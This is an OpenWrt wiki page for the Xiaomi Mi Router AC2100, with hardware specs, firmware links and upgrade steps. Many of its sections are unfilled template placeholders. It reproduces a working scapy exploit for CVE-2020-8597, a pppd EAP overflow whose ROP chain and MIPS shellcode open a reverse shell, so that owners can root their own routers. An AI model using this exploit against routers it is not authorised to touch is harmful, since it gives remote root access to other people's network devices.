Xiaomi Mi Router AC2100

Under Construction! This page is currently under construction. You can edit the article to help complete it.

The Xiaomi Mi Router AC2100 is a wireless router built on the MediaTek MT7621 platform. From a technical standpoint, its specification is nearly identical to that of the Redmi AC2100. It runs Xiaomi's router firmware by default and, like the Redmi, installing OpenWrt requires a PPPoE exploit (CVE-2020-8597, see Installation) to obtain a shell, after which OpenWrt is flashed from the command line interface.

Support Forums: https://forum.openwrt.org/t/new-xiaomi-router-ac2100

Supported Versions

Brand: Xiaomi
Model: Mi Router AC2100
Version: (none)
Current Release: snapshot
OEM Info: https://www.mi.com/miwifiac
Forum Search: Mi Router AC2100
Technical Data: View/Edit data

Experimental Versions

None at this time.
Hardware Highlights

Model: Mi Router AC2100
Version: (none)
SoC: MediaTek MT7621A
CPU MHz: 880
Flash MB: 128 (NAND)
RAM MB: 128
WLAN Hardware: MediaTek MT7603, MediaTek MT7615
WLAN 2.4 GHz: b/g/n
WLAN 5.0 GHz: a/n/ac
100M ports: -
Gbit ports: 4
Modem: -
USB: -

Installation

Model: Mi Router AC2100
Version: (none)
Current Release: snapshot
Firmware OpenWrt snapshot Install:
  http://downloads.openwrt.org/snapshots/targets/ramips/mt7621/openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-kernel1.bin
  http://downloads.openwrt.org/snapshots/targets/ramips/mt7621/openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-rootfs0.bin
Firmware OpenWrt snapshot Upgrade:
  http://downloads.openwrt.org/snapshots/targets/ramips/mt7621/openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-sysupgrade.bin
Firmware OEM Stock:
  http://miwifi.com/miwifi_download.html

Backport build

Unofficial stable build (scp07 Build): firmware, source.

Software Preparation

- Two Ethernet cables
- Python 3 installed on your PC
- The OpenWrt firmware downloaded from this page
- A script that implements CVE-2020-8597 (see below)

A PoC of CVE-2020-8597, from a GitHub Gist, is reproduced below. You need to change the interface to match the name of the interface connected to the Xiaomi router. Also, change the (beginning of the) MAC address on the line if src.startswith("88:c3:97") to match your router; the full MAC address of the router is printed on a sticker attached to the router. There is a good AC2100-OpenWRT-Guide on GitHub with pictures explaining the installation procedure.
```python
from scapy.all import *
from socket import *

interface = "enp0s31f6"

def mysend(pay, interface=interface):
    sendp(pay, iface=interface)

def packet_callback(packet):
    global sessionid, src, dst
    sessionid = int(packet['PPP over Ethernet'].sessionid)
    dst = (packet['Ethernet'].dst)
    src = (packet['Ethernet'].src)
    # In case we pick up Router -> PPPoE server packet
    if src.startswith("88:c3:97"):
        src, dst = dst, src
    print("sessionid:" + str(sessionid))
    print("src:" + src)
    print("dst:" + dst)

def eap_response_md5():
    md5 = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10"
    # Reverse shell, connect to 192.168.31.177:31337
    stg3_SC = b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    stg3_SC += b"\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    stg3_SC += b"\xf8\xff\xa5\xaf\x1f\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    stg3_SC += b"\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    stg3_SC += b"\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    stg3_SC += b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    stg3_SC += b"\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    stg3_SC += b"\xab\x0f\x02\x24\x0c\x09\x09\x01"

    reboot_shell = b"\x23\x01\x06\x3c"
    reboot_shell += b"\x67\x45\xc6\x34"
    reboot_shell += b"\x12\x28\x05\x3c"
    reboot_shell += b"\x69\x19\xa5\x24"
    reboot_shell += b"\xe1\xfe\x04\x3c"
    reboot_shell += b"\xad\xde\x84\x34"
    reboot_shell += b"\xf8\x0f\x02\x24"
    reboot_shell += b"\x0c\x01\x01\x01"

    #Debug sleep
    #s0 = b"\x00\x00\x00\x00"
    #s1 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    #s2 = b"\x03\x00\x00\x00"
    #s3 = b"\x01\x00\x00\x00"
    #s4 = b"\x0c\x93\x40\x00"
    #s5 = b"\x00\x00\x00\x00"

    #Debug reboot
    #s0 = b"\x00\x00\x00\x00"
    #s1 = b"\xB0\x9B\xEB\x77" # uclibc reboot(s2) base + 0xfbb0 = 77EB9BB0
    #s2 = b"\x67\x45\x23\x01"
    #s3 = b"\x01\x00\x00\x00"
    #s4 = b"\x0c\x93\x40\x00"
    #s5 = b"\x00\x00\x00\x00"
    #ra = b"\x04\xdb\x40\x00" # 0x0040db04 : move $a0, $s2 ; move $t9, $s1 ; jalr $t9

    s0 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    s1 = b"\x01\x00\x00\x00"
    s2 = b"\x41\x41\x41\x41"
    s3 = b"\x00\x64\xFF\x7F" # 7ffd6000-7fff7000 rwxp 00000000 00:00 0 [stack]
    s4 = b"\x88\xe1\x40\x00" # pppd.txt:0x0040e188
    s5 = b"\x00\x00\x00\x00"
    ra = b"\x0C\x81\xF1\x77" # libuClibc.txt:0x0006e10c 77F1810C

    rop_chain = (b'A' * 0x184)
    rop_chain += s0
    rop_chain += s1
    rop_chain += s2
    rop_chain += s3
    rop_chain += s4
    rop_chain += s5
    rop_chain += ra
    # Nop slide
    rop_chain += (b'\x00' * 0x100)
    # Small reboot shellcode for testing
    #rop_chain += reboot_shell
    rop_chain += stg3_SC
    # Just padding the end a little, since the last byte gets set to 0x00 and not everyone uses a 4 * 0x00 as nop
    rop_chain += (b'\x00' * 0x4)

    pay = Ether(dst=dst, src=src, type=0x8864)/PPPoE(code=0x00, sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100, value=md5, optional_name=rop_chain)
    mysend(pay)

if __name__ == '__main__':
    sniff(prn=packet_callback, iface=interface, filter="pppoes", count=1)
    eap_response_md5()
```

TFTP recovery parameters (enter values for "FILL-IN" below):

Bootloader tftp server IPv4 address: FILL-IN
Bootloader MAC address (special): FILL-IN
Firmware tftp image: Latest OpenWrt release (NOTE: name must contain "tftp")
TFTP transfer window: FILL-IN seconds
TFTP window start: approximately FILL-IN seconds after power on
TFTP client required IP address: FILL-IN

Upgrading OpenWrt

→ generic.sysupgrade

These are generic instructions. Update with your router's specifics.
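OpenWrt publishes a sha256sums file in the same download directory as each image. The script below is an added example, not part of this wiki page or of OpenWrt's own tooling; it checks a downloaded sysupgrade image against that file before calling sysupgrade, and assumes busybox sha256sum, awk and wget are available on the router.

```sh
#!/bin/sh
# Added example (not from the OpenWrt wiki or OpenWrt's own tooling):
# verify a downloaded sysupgrade image against the sha256sums file that
# OpenWrt publishes in the same download directory, and flash only on match.
# Assumes sha256sum, awk and wget are available (busybox provides all three).

# verify_image IMAGE SUMSFILE
# Returns 0 if IMAGE's SHA-256 equals the sha256sums entry for its basename,
# 1 if there is no entry or the digest differs. Entries look like:
#   <64 hex chars> *<filename>
verify_image() {
  image="$1"
  sums="$2"
  name=$(basename "$image")
  # Compare the exact filename, not a substring, so "x.bin" does not
  # accept the entry for "foo-x.bin".
  expected=$(awk -v n="$name" \
    '{ f = $2; sub(/^\*/, "", f); if (f == n) { print $1; exit } }' "$sums")
  if [ -z "$expected" ]; then
    echo "verify_image: no sha256sums entry for $name" >&2
    return 1
  fi
  actual=$(sha256sum "$image" | awk '{ print $1 }')
  if [ "$actual" != "$expected" ]; then
    echo "verify_image: digest mismatch for $name" >&2
    echo "  expected $expected" >&2
    echo "  actual   $actual" >&2
    return 1
  fi
  return 0
}

# fetch_and_flash BASEURL IMAGENAME
# Downloads the image and the sha256sums file from BASEURL into /tmp (the
# ramdisk, as the upgrade steps on this page require) and runs sysupgrade
# only if the digest checks out. BASEURL for this device's snapshot images,
# from the Installation table above:
#   http://downloads.openwrt.org/snapshots/targets/ramips/mt7621
fetch_and_flash() {
  base="$1"
  name="$2"
  cd /tmp || return 1
  wget -O "$name" "$base/$name" || return 1
  wget -O sha256sums "$base/sha256sums" || return 1
  verify_image "/tmp/$name" /tmp/sha256sums || {
    echo "refusing to flash $name" >&2
    return 1
  }
  sysupgrade "/tmp/$name"
}
```

Because both files travel over the same plain-HTTP path the page uses, this catches a corrupted or truncated download but not an on-path substitution of both files; for that, fetch the sums file over HTTPS or check OpenWrt's signature on it (sha256sums.asc / sha256sums.sig) first.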
LuCI Web Upgrade Process

- Browse to http://192.168.1.1/cgi-bin/luci/mini/system/upgrade/ (LuCI Upgrade URL)
- Upload the sysupgrade image file to LuCI
- Wait for the reboot

Terminal Upgrade Process

If you don't have a GUI (LuCI) available, you can alternatively upgrade via the command line. There are two command line methods for upgrading: sysupgrade and mtd.

Note: It is important that you put the firmware image into the ramdisk (/tmp) before you start flashing.

sysupgrade

Login as root via SSH on 192.168.1.1, then enter the following commands:

```sh
cd /tmp
wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc
sysupgrade /tmp/xxx.abc
```

mtd

If sysupgrade does not support this router, use mtd. Login as root via SSH on 192.168.1.1, then enter the following commands:

```sh
cd /tmp
wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc
mtd write /tmp/xxx.abc linux && reboot
```

Debricking

→ generic.debrick

Failsafe mode

→ failsafe_and_factory_reset

Basic configuration

→ Basic configuration

After flashing, proceed with this: set up your Internet connection, configure wireless, configure the USB port, etc.

Specific Configuration

The values below are template EXAMPLEs and have not yet been filled in for this device.

Network interfaces

The default network configuration is:

Interface Name | Description | Default configuration
br-lan | EXAMPLE LAN & WiFi | EXAMPLE 192.168.1.1/24
vlan0 (eth0.0) | EXAMPLE LAN ports (1 to 4) | EXAMPLE None
vlan1 (eth0.1) | EXAMPLE WAN port | EXAMPLE DHCP
wl0 | EXAMPLE WiFi | EXAMPLE Disabled

Switch Ports (for VLANs)

The values below are template EXAMPLEs and have not yet been filled in for this device. Numbers 0-3 are Ports 1-4 as labeled on the unit, number 4 is the Internet (WAN) port on the unit, and 5 is the internal connection to the router itself. Don't be fooled: Port 1 on the unit is number 3 when configuring VLANs. vlan0 = eth0.0, vlan1 = eth0.1, and so on.
Port | Switch port
Internet (WAN) | EXAMPLE 4
LAN 1 | EXAMPLE 3
LAN 2 | EXAMPLE 2
LAN 3 | EXAMPLE 1
LAN 4 | EXAMPLE 0

Buttons

→ hardware.button on how to use and configure the hardware button(s). Here, we merely name the buttons so we can use them in the above Howto. The values below are template EXAMPLEs and have not yet been filled in for this device.

The Xiaomi Mi Router AC2100 has the following buttons:

BUTTON | Event
EXAMPLE Reset | reset
EXAMPLE Secure Easy Setup | ses
EXAMPLE No buttons at all. | -

Hardware Info

Nothing. (No Techdata table has been generated for the Xiaomi Mi Router AC2100 yet.)

Photos

Front: Insert photo of front of the casing
Back: Insert photo of back of the casing
Backside label: Insert photo of backside label

Opening the case

Note: This will void your warranty!

Describe what needs to be done to open the device, e.g. remove rubber feet, adhesive labels, screws, … To remove the cover and open the device, do a/b/c.

Main PCB: Insert photo of PCB

Serial

→ port.serial general information about the serial port, serial port cable, etc.

How to connect to the Serial Port of this specific device: Insert photo of PCB with markings for serial port

Serial connection parameters for Xiaomi Mi Router AC2100 @@Version@@ (EXAMPLE, not yet verified): 115200, 8N1

JTAG

→ port.jtag general information about the JTAG port, JTAG cable, etc.

How to connect to the JTAG Port of this specific device: Insert photo of PCB with markings for JTAG port

Bootloader mods

→ bootloader

Hardware mods

None so far.

Bootlogs

OEM bootlog: COPY HERE THE BOOTLOG WITH THE ORIGINAL FIRMWARE

OpenWrt bootlog: COPY HERE THE BOOTLOG ONCE OPENWRT IS INSTALLED AND RUNNING

Notes

Space for additional notes, links to forum threads or other resources. …

Tags

EXAMPLETAG

Last modified: 2020/12/17 06:47 by lessload